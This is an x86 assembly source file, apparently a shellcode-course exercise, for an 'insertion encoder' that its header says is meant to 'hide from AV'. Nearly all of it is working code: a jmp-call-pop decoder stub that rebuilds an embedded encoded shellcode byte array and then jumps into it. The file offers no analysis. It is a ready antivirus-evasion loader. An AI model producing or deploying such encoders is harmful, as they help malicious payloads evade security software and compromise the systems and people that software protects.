;-------------------------------------
;
; Author: dubs3c
;
; Purpose:
; Insertion Encoder, hide from AV :)
;
;-------------------------------------

global _start

section .text
_start:
    jmp short call_shellcode

decoder:
    pop esi
    lea edi, [esi + 1]
    xor eax, eax
    xor ebx, ebx
    xor edx, edx
    mov al, slen
    mov bl, 0x2

    div ebx
    mov ecx, eax    ; move real length of shellcode to ecx
    mov al, 0x1    ; set AL to 1, first index to look for
    lea edi, [esi]  ; save start location of EncodedShellcode
    jmp decode

increment:
    lea esi, [esi+2]

decode:
    mov dl, byte [esi]
    cmp edx, eax
    jne increment

    mov dl, byte [esi+1]
    mov byte [edi + eax - 1], dl

    inc eax

    lea esi, [esi+2]
    ;lea edi, [edi+2]
    loop decode
    jmp EncodedShellcode

call_shellcode:
    call decoder
    EncodedShellcode: db 0x24,0xdc,0x25,0x3a,0x53,0xd3,0x51,0xd4,0x1b,0xdf,0x36,0x75,0x48,0x5e,0x4f,0xfb,0x22,0x3d,0x14,0x03,0x55,0x4d,0x39,0xac,0x3c,0xb2,0x16,0x12,0x47,0x24,0x5c,0x94,0x46,0x62,0x50,0x60,0x5,0x2a,0x5d,0xea,0x28,0x86,0x19,0x64,0x2f,0x7e,0x8,0xd9,0x41,0x03,0x3f,0x9b,0xc,0x5f,0xa,0x24,0x4b,0x64,0x27,0xde,0x40,0x0c,0x4c,0xc8,0x30,0x1f,0x6,0xd9,0x32,0x1a,0x1f,0xc3,0x35,0xc4,0x1,0xbd,0xf,0xb1,0x18,0x84,0x5b,0xef,0x3e,0x01,0x2,0x6b,0x59,0xde,0x2a,0x23,0x56,0xcc,0x5a,0x47,0x15,0x6f,0x26,0x20,0x2d,0xba,0x1c,0x6b,0xb,0xf4,0x1d,0x4e,0x1e,0x81,0x3,0x98,0x12,0x6f,0x4a,0xe5,0x52,0x3a,0x33,0x79,0x57,0xc8,0x38,0xb7,0x4e,0xc9,0x9,0x74,0x58,0x80,0x21,0x33,0x2c,0x1f,0x11,0x31,0x31,0xf3,0x44,0x3f,0x29,0xf1,0x7,0xe9,0x34,0x77,0x2e,0x1b,0x10,0x12,0x20,0xd8,0x42,0x41,0x17,0x83,0xd,0x31,0x45,0x7f,0x2b,0x8c,0x1a,0x71,0x23,0x6e,0x49,0xb2,0x37,0x79,0x3b,0x7a,0x4d,0x23,0x3d,0x15,0x4,0x93,0x5e,0x9a,0x13,0x12,0x43,0x0d,0xe,0xc9,0x54,0x12,0x3a,0x87,0x5f,0x70
    slen    equ $ - EncodedShellcode

